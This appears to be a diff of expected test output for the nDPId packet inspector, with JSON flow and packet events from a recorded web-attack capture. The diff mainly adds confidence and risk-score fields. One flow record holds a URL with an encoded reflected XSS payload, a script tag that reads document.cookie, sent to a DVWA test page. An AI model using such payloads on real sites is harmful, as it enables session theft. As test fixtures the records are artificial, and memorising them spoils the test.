 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347679469,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347679469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="}
@@ -2394,19 +2394,19 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1499347688364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347688364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C45AAD4GukKsEAABwKgKMunaAFB\/Haw5AAAAAKACchCgjwAAAgQFtAQCCAoBO6e3AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":2,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347688365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6dpm6d+Cfx2sOqAScSDd8AAAAgQFtAQCCAoD5XksATuntwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":3,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347688365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C49AAD4GukmsEAABwKgKMunaAFB\/Haw6Zunfg4AQAOV8+AAAAQEICgE7p7cD5Xks"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689377,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347689613,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347689613,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347689613,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80NlAAD4G9PasEAABwKgKMunoAFDCAng2AAAAAKACchCQZwAAAgQFtAQCCAoBO6jvAAAAAAEDAwc="}
@@ -2432,17 +2432,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iq9AAD4GOyGsEAABwKgKMupGAFDXwDs\/AAAAAKACchCuoQAAAgQFtAQCCAoBO7GQAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":2,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347698449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6kYJky3T18A7QKAScSDxLwAAAgQFtAQCCAoD5YMFATuxkAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":3,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0irBAAD4GOyisEAABwKgKMupGAFDXwDtACZMt1IAQAOWQNgAAAQEICgE7sZED5YMF"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
